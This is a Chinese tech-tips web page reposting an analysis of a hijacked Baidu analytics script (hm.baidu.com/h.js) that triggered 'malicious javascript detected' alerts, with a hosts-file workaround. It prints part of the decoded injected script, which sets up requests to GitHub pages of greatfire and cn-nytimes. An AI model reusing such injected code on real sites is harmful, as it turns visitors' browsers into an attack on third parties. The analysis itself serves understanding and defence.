萬盛學電腦網 >> 電腦基本常識 >> 一招解決WARNING: malicious javascript detected on this domain

一招解決WARNING: malicious javascript detected on this domain

一招解決WARNING: malicious javascript detected on this domain 三聯

　　臨時解決方法：

　　修改hosts，添加""127.0.0.1 hm.baidu.com" 。

　　詳細原因分析：今天中午刷著全國最大的信息安全從業人員同性交友社區zone.wooyun.org的時候，忽然浏覽器每隔2秒就不斷的彈窗：

　　malicious javascript detected on this domain

　　我第一反應就是不知道哪個調皮的基友又把zone給XSS了，馬上打開開發者工具分析。

　　0x01 細節

　　之後立刻發現彈窗的js居然是從github加載的：

　　可是為什麼烏雲會從github加載js呢，並且還是從greatfire和紐約時報鏡像加載。

　　第一反應是頁面有xss或者js被劫持了，找了半天終於找到了，居然是

　　hm.baidu.com/h.js

　　這個js的確被烏雲加載了沒錯，這是百度統計的js代碼，打開後裡面是一個簡單加密後的js，eval了一串編碼後的內容，隨便找了個在線解密看了下，發現如下內容:

document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>x3c/script>");

!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>x3c/script>");

startime = (new Date).getTime();

var count = 0;

function unixtime() {

var a = new Date;

return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3

}

url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];

NUM = url_array.length;

萬盛學電腦網

萬盛學電腦網 >> 電腦基本常識 >> 一招解決WARNING: malicious javascript detected on this domain

一招解決WARNING: malicious javascript detected on this domain

電腦基本常識排行

電腦基礎推薦

熱門文章

相關文章

圖片文章

WinXP系統屏幕倒立如何將倒立的屏幕界面擺正

如何查看IE浏覽器的版本

簡單遠程控制電腦方法

度秘怎麼找美食？百度度秘找美食教程電腦技術吧

萬盛學電腦網 | 設為首頁 | 加入收藏

萬盛學電腦網

萬盛學電腦網 >> 電腦基本常識 >> 一招解決WARNING: malicious javascript detected on this domain

一招解決WARNING: malicious javascript detected on this domain

電腦基本常識排行

電腦基礎推薦

熱門文章

相關文章

圖片文章

WinXP系統屏幕倒立如何將倒立的屏幕界面擺正

如何查看IE浏覽器的版本

簡單遠程控制電腦方法

度秘怎麼找美食？百度度秘找美食教程 電腦技術吧

萬盛學電腦網 | 設為首頁 | 加入收藏

度秘怎麼找美食？百度度秘找美食教程電腦技術吧